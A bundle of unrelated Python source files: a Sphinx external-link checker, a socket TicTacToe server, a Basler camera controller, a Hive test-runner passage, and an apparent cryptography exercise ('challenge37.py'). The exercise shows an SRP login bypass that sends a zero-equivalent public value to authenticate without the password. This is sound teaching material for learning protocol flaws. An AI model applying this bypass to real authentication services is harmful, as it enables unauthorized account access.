epilog = __('Look for any errors in the above output or in '
'%(outdir)s/output.txt')
def init(self) -> None:
self.to_ignore = [re.compile(x) for x in self.app.config.linkcheck_ignore]
self.anchors_ignore = [re.compile(x)
for x in self.app.config.linkcheck_anchors_ignore]
self.auth = [(re.compile(pattern), auth_info) for pattern, auth_info
in self.app.config.linkcheck_auth]
self.good = set() # type: Set[str]
self.broken = {} # type: Dict[str, str]
self.redirected = {} # type: Dict[str, Tuple[str, int]]
# set a timeout for non-responding servers
socket.setdefaulttimeout(5.0)
# create output file
open(path.join(self.outdir, 'output.txt'), 'w').close()
# create JSON output file
open(path.join(self.outdir, 'output.json'), 'w').close()
# create queues and worker threads
self.wqueue = queue.Queue() # type: queue.Queue
self.rqueue = queue.Queue() # type: queue.Queue
self.workers = [] # type: List[threading.Thread]
for i in range(self.app.config.linkcheck_workers):
thread = threading.Thread(target=self.check_thread)
thread.setDaemon(True)
thread.start()
self.workers.append(thread)
def check_thread(self) -> None:
kwargs = {
'allow_redirects': True,
} # type: Dict
if self.app.config.linkcheck_timeout:
kwargs['timeout'] = self.app.config.linkcheck_timeout
def get_request_headers() -> Dict:
url = urlparse(uri)
candidates = ["%s://%s" % (url.scheme, url.netloc),
"%s://%s/" % (url.scheme, url.netloc),
uri,
"*"]
for u in candidates:
if u in self.config.linkcheck_request_headers:
headers = dict(DEFAULT_REQUEST_HEADERS)
headers.update(self.config.linkcheck_request_headers[u])
return headers
return {}
def check_uri() -> Tuple[str, str, int]:
# split off anchor
if '#' in uri:
req_url, anchor = uri.split('#', 1)
for rex in self.anchors_ignore:
if rex.match(anchor):
anchor = None
break
else:
req_url = uri
anchor = None
# handle non-ASCII URIs
try:
req_url.encode('ascii')
except UnicodeError:
req_url = encode_uri(req_url)
# Get auth info, if any
for pattern, auth_info in self.auth:
if pattern.match(uri):
break
else:
auth_info = None
# update request headers for the URL
kwargs['headers'] = get_request_headers()
try:
if anchor and self.app.config.linkcheck_anchors:
# Read the whole document and see if #anchor exists
response = requests.get(req_url, stream=True, config=self.app.config,
auth=auth_info, **kwargs)
found = check_anchor(response, unquote(anchor))
if not found:
raise Exception(__("Anchor '%s' not found") % anchor)
else:
try:
# try a HEAD request first, which should be easier on
# the server and the network
response = requests.head(req_url, config=self.app.config,
auth=auth_info, **kwargs)
response.raise_for_status()
except HTTPError:
# retry with GET request if that fails, some servers
# don't like HEAD requests.
response = requests.get(req_url, stream=True, config=self.app.config,
auth=auth_info, **kwargs)
response.raise_for_status()
except HTTPError as err:
if err.response.status_code == 401:
# We'll take "Unauthorized" as working.
return 'working', ' - unauthorized', 0
elif err.response.status_code == 503:
# We'll take "Service Unavailable" as ignored.
return 'ignored', str(err), 0
else:
return 'broken', str(err), 0
except Exception as err:
if is_ssl_error(err):
return 'ignored', str(err), 0
else:
return 'broken', str(err), 0
if response.url.rstrip('/') == req_url.rstrip('/'):
return 'working', '', 0
else:
new_url = response.url
if anchor:
new_url += '#' + anchor
# history contains any redirects, get last
if response.history:
code = response.history[-1].status_code
return 'redirected', new_url, code
else:
return 'redirected', new_url, 0
def check() -> Tuple[str, str, int]:
# check for various conditions without bothering the network
if len(uri) == 0 or uri.startswith(('#', 'mailto:')):
return 'unchecked', '', 0
elif not uri.startswith(('http:', 'https:')):
if uri_re.match(uri):
# non supported URI schemes (ex. ftp)
return 'unchecked', '', 0
else:
if path.exists(path.join(self.srcdir, uri)):
return 'working', '', 0
else:
for rex in self.to_ignore:
if rex.match(uri):
return 'ignored', '', 0
else:
return 'broken', '', 0
elif uri in self.good:
return 'working', 'old', 0
elif uri in self.broken:
return 'broken', self.broken[uri], 0
elif uri in self.redirected:
return 'redirected', self.redirected[uri][0], self.redirected[uri][1]
for rex in self.to_ignore:
if rex.match(uri):
return 'ignored', '', 0
# need to actually check the URI
for _ in range(self.app.config.linkcheck_retries):
status, info, code = check_uri()
if status != "broken":
break
if status == "working":
self.good.add(uri)
elif status == "broken":
self.broken[uri] = info
elif status == "redirected":
self.redirected[uri] = (info, code)
return (status, info, code)
while True:
uri, docname, lineno = self.wqueue.get()
if uri is None:
break
status, info, code = check()
self.rqueue.put((uri, docname, lineno, status, info, code))
def process_result(self, result: Tuple[str, str, int, str, str, int]) -> None:
uri, docname, lineno, status, info, code = result
filename = self.env.doc2path(docname, None)
linkstat = dict(filename=filename, lineno=lineno,
status=status, code=code, uri=uri,
info=info)
if status == 'unchecked':
self.write_linkstat(linkstat)
return
if status == 'working' and info == 'old':
self.write_linkstat(linkstat)
return
if lineno:
logger.info('(line %4d) ', lineno, nonl=True)
if status == 'ignored':
if info:
logger.info(darkgray('-ignored- ') + uri + ': ' + info)
else:
logger.info(darkgray('-ignored- ') + uri)
self.write_linkstat(linkstat)
elif status == 'local':
logger.info(darkgray('-local- ') + uri)
self.write_entry('local', docname, filename, lineno, uri)
self.write_linkstat(linkstat)
elif status == 'working':
logger.info(darkgreen('ok ') + uri + info)
self.write_linkstat(linkstat)
elif status == 'broken':
if self.app.quiet or self.app.warningiserror:
logger.warning(__('broken link: %s (%s)'), uri, info,
location=(filename, lineno))
else:
logger.info(red('broken ') + uri + red(' - ' + info))
self.write_entry('broken', docname, filename, lineno, uri + ': ' + info)
self.write_linkstat(linkstat)
elif status == 'redirected':
try:
text, color = {
301: ('permanently', purple),
302: ('with Found', purple),
303: ('with See Other', purple),
307: ('temporarily', turquoise),
308: ('permanently', purple),
}[code]
except KeyError:
text, color = ('with unknown code', purple)
linkstat['text'] = text
logger.info(color('redirect ') + uri + color(' - ' + text + ' to ' + info))
self.write_entry('redirected ' + text, docname, filename,
lineno, uri + ' to ' + info)
self.write_linkstat(linkstat)
def get_target_uri(self, docname: str, typ: str = None) -> str:
return ''
def get_outdated_docs(self) -> Set[str]:
return self.env.found_docs
def prepare_writing(self, docnames: Set[str]) -> None:
return
def write_doc(self, docname: str, doctree: Node) -> None:
logger.info('')
n = 0
# reference nodes
for refnode in doctree.traverse(nodes.reference):
if 'refuri' not in refnode:
continue
uri = refnode['refuri']
lineno = get_node_line(refnode)
self.wqueue.put((uri, docname, lineno), False)
n += 1
# image nodes
for imgnode in doctree.traverse(nodes.image):
uri = imgnode['candidates'].get('?')
if uri and '://' in uri:
lineno = get_node_line(imgnode)
self.wqueue.put((uri, docname, lineno), False)
n += 1
done = 0
while done < n:
self.process_result(self.rqueue.get())
done += 1
if self.broken:
self.app.statuscode = 1
def write_entry(self, what: str, docname: str, filename: str, line: int,
uri: str) -> None:
with open(path.join(self.outdir, 'output.txt'), 'a') as output:
output.write("%s:%s: [%s] %s\n" % (filename, line, what, uri))
def write_linkstat(self, data: dict) -> None:
with open(path.join(self.outdir, 'output.json'), 'a') as output:
output.write(json.dumps(data))
output.write('\n')
def finish(self) -> None:
for worker in self.workers:
self.wqueue.put((None, None, None), False)
def setup(app: Sphinx) -> Dict[str, Any]:
app.add_builder(CheckExternalLinksBuilder)
app.add_config_value('linkcheck_ignore', [], None)
app.add_config_value('linkcheck_auth', [], None)
app.add_config_value('linkcheck_request_headers', {}, None)
app.add_config_value('linkcheck_retries', 1, None)
app.add_config_value('linkcheck_timeout', None, None, [int])
app.add_config_value('linkcheck_workers', 5, None)
app.add_config_value('linkcheck_anchors', True, None)
# Anchors starting with ! are ignored since they are
# commonly used for dynamic pages
app.add_config_value('linkcheck_anchors_ignore', ["^!"], None)
return {
'version': 'builtin',
'parallel_read_safe': True,
'parallel_write_safe': True,
}
|
TicTacToeServer.py
|
import socket
import threading
import queue
from threading import Thread
from time import sleep
import select
import sys
import json
from TicTacToeMessage import TicTacToeLoginMessage
from TicTacToeMessage import TicTacToeStartStop
from TicTacToeMessage import TicTacToeGameMessage
player_dict = dict ()
player_symbol = ['X', 'O']
def checkWinner (move):
count = 0;
status = False
row = [0,0,0]
sum_diag = 0
diag = [0,4,8]
col = [0,0,0]
total_set = 0
while (count < 9):
entry = []
sum_row = 0
index = (int)(count/3)
for i in range (3):
if (move [count +i] == 'X'):
row [index] += 1
col [i] += 1
total_set +=1
if ((count +i) in diag):
sum_diag += 1
elif (move [count + i] == 'O'):
total_set +=1
row [index] += 4
col [i] += 4
if ((count +i) in diag):
sum_diag += 4
elif (move [count + i]== ' '):
row [index] += 0
col [i] += 0
count+=3
if (3 in row or 12 in row) or (3 in col or 12 in col) or (sum_diag == 3 or sum_diag == 12):
return (True,True)
if (total_set == 9):
status = True
return (status, False)
def readLoop (readable, inputs, outputs, server, message_queues):
# Handle inputs
for s in readable:
if s is server:
# A "readable" server socket is ready to accept a connection
connection, client_address = s.accept()
print ("new connection from : %s ", client_address)
connection.setblocking(0)
inputs.append(connection)
# Give the connection a queue for data we want to send
message_queues[connection] = queue.Queue()
else:
data = s.recv(1024)
if data:
# A readable client socket has data
# print (s)
# print (s.getpeername ())
# print (str (s.getpeername ()[0])+":"+str (s.getpeername ()[1]))
body = json.loads (data.decode ("utf-8"))
if (body ['Action'] == 'LOGIN'):
msg = TicTacToeLoginMessage (body ['Player'], body ['Action'])
msg.setmsg (data)
player_dict [s] = msg.getPlayerName ()
if (len (player_dict) == 2):
start = TicTacToeStartStop ('START')
message_queues [s].put (start.getmsg())
else:
message_queues[s].put (data)
# Add output channel for response
if s not in outputs:
outputs.append(s)
else:
# Interpret empty result as closed connection
# print >>sys.stderr, 'closing', client_address, 'after reading no data'
# Stop listening for input on the connection
if s in outputs:
outputs.remove(s)
inputs.remove(s)
s.close()
# Remove message queue
del message_queues[s]
if s in player_dict.keys ():
del player_dict [s]
stop = TicTacToeStartStop ('STOP')
for sockt,m in message_queues.items ():
m.put (stop.getmsg ())
def writeLoop (message_queues, outputs):
for m in message_queues:
size = 0
if (not message_queues [m].empty ()):
size = message_queues [m].qsize ();
while (size > 0):
item = message_queues [m].get (False, None)
body = json.loads (item)
if (body ['Action'] == 'START' and len(player_dict) == 2):
for sock, player in player_dict.items():
if (sock != m):
player_msg_1 = TicTacToeGameMessage (player_dict [m], 'PLAYER_TURN')
player_msg_1.setPlayer1 (player, player_symbol [0])
player_msg_1.setPlayerTurn (player)
for sock, player in player_dict.items():
if (sock == m):
player_msg_1.setPlayer2 (player, player_symbol [1])
move = []
for i in range (9):
move.append (' ')
player_msg_1.setPlayerMove (move)
for s in outputs:
s.send (player_msg_1.getmsg ())
elif (body ['Action'] == 'STOP'):
player_msg_1 = TicTacToeGameMessage ('None', 'GAME_VOID')
for s in outputs:
s.send (player_msg_1.getmsg ())
player_dict.clear ()
elif (body ['Action'] == 'SERVER_TURN'):
player_msg = TicTacToeGameMessage ()
player_msg.setmsg (item)
status = checkWinner (player_msg.getPlayerMove ())
if (status [0]):
if (status [1]):
print (" We have winnder ", player_msg.getPlayerTurn ())
else:
print ("We have Tie")
player_msg.setPlayerTurn ("None (Tie)")
player_msg.setPlayerAction('GAME_RESULT')
player_dict.clear ()
else:
for player in player_dict.values ():
if (player != player_msg.getPlayerTurn ()):
player_msg.setPlayerTurn (player)
break
player_msg.setPlayerAction ('PLAYER_TURN')
for s in outputs:
s.send (player_msg.getmsg ())
size-=1
def exceptLoop (s):
pass
def serverLoop (server):
read_fd = [server]
write_fd = []
except_fd = []
message_queues = {}
while (1):
readlist,writelist,except_list = select.select (read_fd, write_fd,read_fd,None)
readLoop (readlist, read_fd, write_fd, server, message_queues)
writeLoop (message_queues, write_fd)
exceptLoop (server)
def ServerMain ():
s = socket.socket() # Create a socket object
host = socket.gethostname() # Get local machine name
port = 50000 # Reserve a port for your service.
print ('Server started!')
print ('Waiting for clients...')
s.bind((host, port)) # Bind to the port
s.listen(2) # Now wait for client connection.
thread = Thread(target = serverLoop, args = (s,))
thread.start()
thread.join()
if __name__ == '__main__':
ServerMain ()
|
challenge37.py
|
from threading import Thread
from .challenge36 import (
create_connection,
get_srp_constants,
hmac_sha256,
num_to_bytes,
sha256_hash,
srp_server,
)
def fake_srp_client(channel, A_val):
email = b"realemail@definitelynotfake.net"
N, g, k = get_srp_constants()
channel.send((email, A_val))
salt, B = channel.receive()
S = 0
K = sha256_hash(num_to_bytes(S))
hmac = hmac_sha256(K, salt)
channel.send(hmac)
def challenge37():
actual_password = b"actual password"
N, g, k = get_srp_constants()
for i in range(10):
print(f"I = {i}")
A_val = i * N
endpoint1, endpoint2 = create_connection()
server = Thread(target=srp_server, args=(endpoint1, actual_password))
server.start()
fake_srp_client(endpoint2, A_val)
server.join()
if __name__ == "__main__":
challenge37()
|
basler_controller.py
|
# LoadAndSaveConfig.py
from pypylon import pylon
from queue import Queue
import platform
import time
import threading
import shutil
import os
import imageio
#import logging, sys
class BaslerController(object):
""" Controller class for the basler camera """
def __init__(self, folder_path, queue):
self.queue = queue
self.img = pylon.PylonImage()
self.cam = pylon.InstantCamera(pylon.TlFactory.GetInstance().CreateFirstDevice())
self.nbr_im = 9
self.folder_path = folder_path
os.mkdir(self.folder_path) # unique folder for this measurement
self.counter = 0
self.thread_move = None
self.nodefile = "acA1920-155um_bin_3.pfs"#"daA1600-60um_gain.pfs"#"acA1920-155um_bin_2.pfs"#"daA1600-60um_gain.pfs"
def open_camera(self):
self.cam.Open()
def close_camera(self):
self.cam.Close()
def update_nodemap_value(self, field, new_value):
file = open(self.nodefile, "r")
new_file_contents = ""
for line in file:
if field in line:
print(field + "updated from {} to {}".format(line.split()[1], str(new_value)))
line = line.replace(line.split()[1], str(new_value))
new_file_contents += line
file.close()
file = open(self.nodefile, "w")
file.write(new_file_contents)
file.close()
def get_nodemap_value(self, field):
file = open(self.nodefile, "r")
for line in file:
if field in line:
print("{} is {}".format(field, line.split()[1]))
value = float(line.split()[1])
if value.is_integer():
value = int(value)
return(value)
raise KeyError("{} not in Nodefile {}".format(field, self.nodefile))
def copy_nodemap(self):
shutil.copy(self.nodefile, self.folder_path + self.nodefile)
def update_nodemap(self):
# The name of the pylon file handle
#shutil.copy(self.nodefile, self.folder_path + self.nodefile) # make a copy of the settings used for this measurement
# Print the model name of the camera.
print("Using device ", self.cam.GetDeviceInfo().GetModelName())
# featurePersistence = pylon.FeaturePersistence()
# read the content of the file back to the camera's node map with enabled validation.
print("Updating nodefile {} to camera's node map.".format(self.nodefile))
pylon.FeaturePersistence.Load(self.nodefile, self.cam.GetNodeMap(), True)
def cont_acq(self):
"""starting a continuos exposure, stopped by setting the stop function"""
self._stop_cont_acq = False
self._save_images = False
self.thread_cont = threading.Thread(target=self._cont_acq,
args=(lambda : self._stop_cont_acq,
lambda : self._save_images,
lambda : self._folder_name,))
self.thread_cont.start()
def stop_cont_acq(self):
self._stop_cont_acq = True
print("stop sent")
self.thread_cont.join()
def save_images(self, folder_name):
self._save_images = True
self._folder_name = folder_name
print("save sent")
def _cont_acq(self, stop, save_images, folder_name):
self.cam.StartGrabbing()
t_grab = time.time()
nbr_imgs_saved = 0
while not stop():
with self.cam.RetrieveResult(2000) as result:
self.counter = self.counter + 1
#print("putting")
self.queue.put(result.Array)
print("bc queue size: {}".format(self.queue.qsize()))
# Calling AttachGrabResultBuffer creates another reference to the
# grab result buffer. This prevents the buffer's reuse for grabbing.
#import pdb;pdb.set_trace()
#self.img.AttachGrabResultBuffer(result)
# In order to make it possible to reuse the grab result for grabbing
# again, we have to release the image (effectively emptying the
# image object).
if save_images():
import pdb;pdb.set_trace()
print("save images")
#self.img.AttachGrabResultBuffer(result)
nbr_imgs_saved += 1
filename = "%d.tiff" % (self.counter % 9)
#self.img.Save(pylon.ImageFileFormat_Tiff , filename)
imageio.imwrite(filename, result.Array)
if nbr_imgs_saved == self.nbr_im:
self._save_images = False
#move images
#check if previous move images is done, otherwise throw error
if self.thread_move:
if self.thread_move.isAlive():
raise BufferError("last batch of are currently being moved, you should lower frame rate or get a faster harddrive.")
self.thread_move = threading.Thread(target=self._move_images, args=(folder_name(),))
self.thread_move.start()
#if self.thread_move:
# if self.thread_move.isAlive():
# print("Moving thread active!")
# else:
#print("not active")
#print(self.counter % 9, end = ',')
#self.img.Release()
#if i % 10 == 0:
#print(i)
#print("counter at %d" % self.counter)
#print("mod %d" % (self.counter % 9))
# Printing every 10 exposures
self.cam.StopGrabbing()
print("Continuous acquisition stopped after", time.time() - t_grab, "seconds")
def _move_images(self, folder_name):
t_move = time.time()
#timestr = time.strftime("%Y%m%d-%H%M%S/")
#coord_str = "led_{}_stage_{}_sample_{}/".format(coords[0], coords[1], coords[2])
os.mkdir(self.folder_path + folder_name)
for i in range(self.nbr_im):
print("moving {}".format(i))
#shutil.move("{}.tiff".format((self.counter + i) % 9), self.folder_path + coord_str + "{}.tiff".format((self.counter + i) % 9))
shutil.move("{}.tiff".format(i), self.folder_path + folder_name + "/{}.tiff".format(i))
print("time of moving 9 images: ", time.time() - t_move)
def move_images(self, coords):
t_move = time.time()
#timestr = time.strftime("%Y%m%d-%H%M%S/")
coord_str = "led_{}_stage_{}_sample_{}/".format(coords[0], coords[1], coords[2])
os.mkdir(self.folder_path + coord_str)
for i in range(self.nbr_im):
print("moving {}".format((self.counter + i) % 9))
print("counter is {}".format(self.counter))
shutil.move("{}.tiff".format((self.counter + i) % 9), self.folder_path + coord_str + "{}.tiff".format((self.counter + i) % 9))
print("time of moving 9 images: ", time.time() - t_move)
|
hivetest.py
|
#!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import argparse
import time
from threading import Thread
import os.path
import collections
import re
import os
import Report
import config
# WARNING
#
# If you are editing this code, please be aware that commands passed to `run`
# should not use single quotes, this will break and end badly as the final
# command looks like `ssh 'host' 'some command - single quote will break it'`.
# Also please be aware that `run` uses `.format` to change `{host}` in commands
# into actual host name it is running on, running `.format` on strings using
# `{host}`, for example including `host_code_path` will not work.
#
# Also this code assumes master_base_path is available to all testing machines
# and is mounted in the same place on all of them.
#
# Getting rid of this restrictions without making the code much more complicated
# is very welcome.
# This is configured in user configuration file.
local = None
qfile_set = None
other_set = None
remote_set = None
all_set = None
master_base_path = None
host_base_path = None
runtest_dir = os.getcwd()
# End of user configurated things.
ant_path = None
arc_path = None
phutil_path = None
code_path = None
report_path = None
host_code_path = None
ivy_path = None
def read_conf(config_file):
global local, qfile_set, other_set, remote_set, all_set
global master_base_path, host_base_path
global ant_path, arc_path, phutil_path, code_path, report_path, host_code_path, ivy_path
if config_file is not None:
config.load(config_file)
else:
config.load()
local = config.local
qfile_set = config.qfile_set
other_set = config.other_set
remote_set = config.remote_set
all_set = config.all_set
master_base_path = config.master_base_path
host_base_path = config.host_base_path
if 'HIVE_PTEST_SUFFIX' in os.environ:
suffix = os.environ['HIVE_PTEST_SUFFIX']
master_base_path += '-' + suffix
host_base_path += '-' + suffix
ant_path = master_base_path + '/apache-ant-1.8.4'
arc_path = master_base_path + '/arcanist'
phutil_path = master_base_path + '/libphutil'
code_path = master_base_path + '/trunk'
report_path = master_base_path + '/report/' + time.strftime('%m.%d.%Y_%H:%M:%S')
host_code_path = host_base_path + '/trunk-{host}'
ivy_path = master_base_path + '/.ivy2'
# Setup of needed environmental variables and paths
# Proxy
if args.http_proxy is not None:
all_set.export('http_proxy', args.http_proxy + ':' + args.http_proxy_port)
all_set.export('https_proxy', args.http_proxy + ':' + args.http_proxy_port)
all_set.export('ANT_OPTS', get_ant_opts_proxy())
# Ant
all_set.export('ANT_HOME', ant_path)
all_set.add_path(ant_path + '/bin')
# Arcanist
all_set.add_path(arc_path + '/bin')
# Java
all_set.export('JAVA_HOME', config.java_home)
all_set.add_path(config.java_home + '/bin')
# Hive
remote_set.export('HIVE_HOME', host_code_path + '/build/dist')
remote_set.add_path(host_code_path + '/build/dist/bin')
def get_ant_opts_proxy():
cmd = ' -Dhttp.proxyHost=' + args.http_proxy
cmd += ' -Dhttp.proxyPort=' + args.http_proxy_port
cmd += ' -Dhttps.proxyHost=' + args.http_proxy
cmd += ' -Dhttps.proxyPort=' + args.http_proxy_port
return cmd
def get_ant():
# Gets Ant 1.8.4 from one of Apache mirrors.
print('\n-- Installing Ant 1.8.4\n')
if local.run('test -d "{0}"'.format(ant_path), warn_only = True,
abandon_output = False) is None:
local.run('mkdir -p "{0}"'.format(master_base_path))
local.cd(master_base_path)
local.run('curl "http://apache.osuosl.org//ant/binaries/apache-ant-1.8.4-bin.tar.gz" | tar xz')
else:
print('\n Ant 1.8.4 already installed\n')
def get_arc():
# Gets latest Arcanist and libphtuil from their Git repositories.
print('\n-- Updating Arcanist installation\n')
if local.run('test -d "{0}"'.format(arc_path), warn_only = True,
abandon_output = False) is None:
local.run('mkdir -p "{0}"'.format(os.path.dirname(arc_path)))
local.run('git clone https://github.com/facebook/arcanist.git "{0}"'
.format(arc_path))
if local.run('test -d "{0}"'.format(phutil_path), warn_only = True,
abandon_output = False) is None:
local.run('mkdir -p "{0}"'.format(os.path.dirname(phutil_path)))
local.run('git clone https://github.com/facebook/libphutil.git "{0}"'
.format(phutil_path))
local.cd(arc_path)
local.run('git pull https://github.com/facebook/arcanist.git')
local.cd(phutil_path)
local.run('git pull https://github.com/facebook/libphutil.git')
def get_clean_hive():
# Gets latest Hive from Apache Git repository and cleans the repository
# (undo of any changes and removal of all generated files). Also runs
# `arc-setup` so the repo is ready to be used.
print('\n-- Updating Hive repo\n')
local.cd(code_path)
if local.run('test -d "{0}"'.format(code_path), warn_only = True,
abandon_output = False) is None:
local.run('mkdir -p "{0}"'.format(os.path.dirname(code_path)))
local.run('git clone http://git.apache.org/hive.git "{0}"'.format(code_path))
else:
# Clean repo and checkout to t he last revision
local.run('git reset --hard HEAD')
local.run('git clean -dffx')
local.run('git pull')
local.run('ant arc-setup')
def copy_local_hive():
# Copy local repo to the destination path instead of using git clone
if local.run('test -d "{0}"'.format(code_path), warn_only = True,
abandon_output = False) is None:
local.run('mkdir -p "{0}"'.format(os.path.dirname(code_path)))
local.run('rm -rf "{0}"'.format(code_path), warn_only = True)
local.run('mkdir -p "{0}"'.format(code_path))
local.run('echo "{0}"'.format(runtest_dir))
local.cd(runtest_dir)
local.run('cp -rf * "{0}"'.format(code_path))
local.cd(code_path)
local.run('ant arc-setup')
def prepare_for_reports():
# Generates directories for test reports. All test nodes will copy results
# to this directories.
print('\n-- Creating a directory for JUnit reports\n')
# Remove previous reports that might be there.
local.run('rm -rf "{0}"'.format(report_path), warn_only = True)
local.run('mkdir -p "{0}/logs"'.format(report_path))
local.run('mkdir -p "{0}/out/clientpositive"'.format(report_path))
local.run('mkdir -p "{0}/out/clientnegative"'.format(report_path))
def patch_hive(patches = [], revision = None):
# Applies given patches to the Hive repo. Revision means a Differential
# revision, patches list is a list of paths to patches on local file system.
#
# Allowing multiple revisions and patches would complicate things a little
# (order of applied patches should be preserved, but argparse will split
# them into two lists) so only multiple local patches are allowed.
# Shouldn't be a big problem as you can use `arc export` to get the patches
# locally.
local.cd(code_path)
if revision is not None:
print('\n-- Patching Hive repo using a Differential revision\n')
revision = revision.upper()
if not revision.startswith('D'):
revision = 'D' + revision
local.run('arc patch "{0}"'.format(revision))
if patches:
print('\n-- Patching Hive repo using a patch from local file system\n')
for patch in patches:
local.run('patch -rf -p0 < "{0}"'.format(patch))
def build_hive():
print('\n-- Building Hive\n')
local.cd(code_path)
cmd = 'ant -Divy.default.ivy.user.dir={0} '.format(ivy_path)
if args.very_clean:
cmd += 'very-clean '
else:
cmd += 'clean '
cmd += 'package'
local.run(cmd)
def propagate_hive():
# Expects master_base_path to be available on all test nodes in the same
# place (for example using NFS).
print('\n-- Propagating Hive repo to all hosts\n')
print(host_code_path)
print(code_path)
remote_set.run('rm -rf "{0}"'.format(host_code_path))
remote_set.run('mkdir -p "{0}"'.format(host_code_path))
remote_set.run('cp -r "{0}/*" "{1}"'.format(
code_path, host_code_path))
# It should avoid issues with 'ivy publish' exceptions during testing phase.
remote_set.run('cp -r "{0}" "{1}"'.format(ivy_path, host_code_path))
def segment_tests(path):
# Removes `.q` files that should not be run on this host. The huge shell
# command is slow (not really suprising considering amount of forking it has
# to do), you are welcome to make it better=).
local.cd(code_path + path)
tests = local.run('ls -1', quiet = True, abandon_output = False).strip().split('\n')
qfile_set.cd(host_code_path + path)
cmd = []
i = 0
for test in tests:
host = qfile_set.conn[i].hostname
cmd.append('if [[ "{host}" != "' + host + '" ]]; then rm -f "' + test + '"; fi')
i = (i + 1) % len(qfile_set)
cmd = ' && '.join(cmd)
# The command is huge and printing it out is not very useful, using wabbit
# hunting mode.
qfile_set.run(cmd, vewy_quiet = True)
def prepare_tests():
print('\n-- Preparing test sets on all hosts\n')
segment_tests('/ql/src/test/queries/clientpositive')
segment_tests('/ql/src/test/queries/clientnegative')
def collect_log(name):
# Moves JUnit log to the global logs directory.
#
# This has the same restriction on master_base_path as propagate_hive.
new_name = name.split('.')
new_name[-2] += '-{host}'
new_name = '.'.join(new_name)
qfile_set.cd(host_code_path + '/build/ql/test')
# If tests failed there may be no file, so warn only if `cp` is having
# problems.
qfile_set.run(
'cp "' + name + '" "' + report_path + '/logs/' + new_name + '" || ' +
'touch "' + report_path + '/logs/{host}-' + name + '.fail"'
)
# Get the hive.log too.
qfile_set.cd(host_code_path + '/build/ql/tmp')
qfile_set.run('cp "hive.log" "' + report_path + '/logs/hive-{host}-' + name + '.log"',
warn_only = True)
def collect_out(name, desc_name):
# Moves `.out` file (test output) to the global logs directory.
#
# This has the same restriction on master_base_path as propagate_hive.
qfile_set.cd(host_code_path + '/' + name)
# Warn only if no files are found.
qfile_set.run('mkdir -p "' + report_path + '/' + desc_name + '/out/' + '"', warn_only = True)
qfile_set.run('cp * "' + report_path + '/' + desc_name + '/out/' + '"', warn_only = True)
def run_tests():
# Runs TestCliDriver and TestNegativeCliDriver testcases.
print('\n-- Running .q file tests on all hosts\n')
# Using `quiet` because output of `ant test` is not very useful when we are
# running on many hosts and it all gets mixed up. In case of an error
# you'll get last lines generated by `ant test` anyway (might be totally
# irrelevant if one of the first tests fails and Ant reports a failure after
# running all the other test, fortunately JUnit report saves the Ant output
# if you need it for some reason).
remote_ivy_path = '$(pwd)/.ivy2'
qfile_set.cd(host_code_path)
qfile_set.run('ant -Divy.default.ivy.user.dir={0} -Dtestcase=TestCliDriver test'.format(remote_ivy_path), quiet = True, warn_only = True)
collect_log('TEST-org.apache.hadoop.hive.cli.TestCliDriver.xml')
collect_out('build/ql/test/logs/clientpositive', 'TestCliDriver')
qfile_set.cd(host_code_path)
qfile_set.run('ant -Divy.default.ivy.user.dir={0} -Dtestcase=TestNegativeCliDriver test'.format(remote_ivy_path), quiet = True, warn_only = True)
collect_log('TEST-org.apache.hadoop.hive.cli.TestNegativeCliDriver.xml')
collect_out('build/ql/test/logs/clientnegative', 'TestNegativeCliDriver')
def run_other_tests():
# Runs all other tests that run_test doesn't run.
def get_other_list():
local.cd(code_path)
# Generate test classes in build.
local.run('ant -Dtestcase=nothing test')
if (args.singlehost):
tests = local.run(' | '.join([
'find build/*/test/classes -name "Test*.class"',
'sed -e "s:[^/]*/::g"',
'grep -v TestSerDe.class',
'grep -v TestHiveMetaStore.class',
'grep -v TestCliDriver.class',
'grep -v TestNegativeCliDriver.class',
'grep -v ".*\$.*\.class"',
'sed -e "s:\.class::"'
]), abandon_output = False)
return tests.split()
else:
tests = local.run(' | '.join([
'find build/*/test/classes -name "Test*.class"',
'sed -e "s:[^/]*/::g"',
'grep -v TestSerDe.class',
'grep -v TestHiveMetaStore.class',
'grep -v TestCliDriver.class',
'grep -v TestNegativeCliDriver.class',
'grep -v ".*\$.*\.class"',
'grep -v TestSetUGIOnBothClientServer.class',
'grep -v TestSetUGIOnOnlyClient.class',
'grep -v TestSetUGIOnOnlyServer.class',
'grep -v TestRemoteHiveMetaStore',
'grep -v TestEmbeddedHiveMetaStore',
'sed -e "s:\.class::"'
]), abandon_output = False)
return tests.split()
def segment_other():
other_set.run('mkdir -p ' + report_path + '/TestContribCliDriver', warn_only = True)
other_set.run('mkdir -p ' + report_path + '/TestContribCliDriver/positive', warn_only = True)
other_set.run('mkdir -p ' + report_path + '/TestContribCliDriver/negative', warn_only = True)
other_set.run('mkdir -p ' + report_path + '/TestHBaseCliDriver', warn_only = True)
# Split all test cases between hosts.
def get_command(test):
return '; '.join([
'ant -Divy.default.ivy.user.dir=$(pwd)/.ivy2 -Dtestcase=' + test + ' test',
'cp "`find . -name "TEST-*.xml"`" "' + report_path + '/logs/" || ' +
'touch "' + report_path + '/logs/{host}-' + test + '.fail"',
'cp "build/ql/tmp/hive.log" "' + report_path + '/logs/hive-{host}-' + test + '.log"',
'cp "build/contrib/test/logs/contribclientnegative/*" "' + report_path + '/TestContribCliDriver/negative 2>/dev/null"',
'cp "build/contrib/test/logs/contribclientpositive/*" "' + report_path + '/TestContribCliDriver/positive 2>/dev/null"',
'cp "build/hbase-handler/test/logs/hbase-handler/*" "' + report_path + '/TestHBaseCliDriver/ 2>/dev/null"'
])
cmd = []
i = 0
for test in get_other_list():
# Special case, don't run minimr tests in parallel. They will run
# on the first host, and no other tests will run there (unless we
# have a single host).
#
# TODO: Real fix would be to allow parallel runs of minimr tests.
if len(other_set) > 1:
if re.match('.*minimr.*', test.lower()):
host = other_set.conn[0].hostname
else:
i = (i + 1) % len(other_set)
if i == 0:
i = 1
host = other_set.conn[i].hostname
else:
# We are running on single host.
host = other_set.conn[0].hostname
cmd.append(
'if [[ "{host}" == "' + host + '" ]]; then ' +
get_command(test) +
'; fi'
)
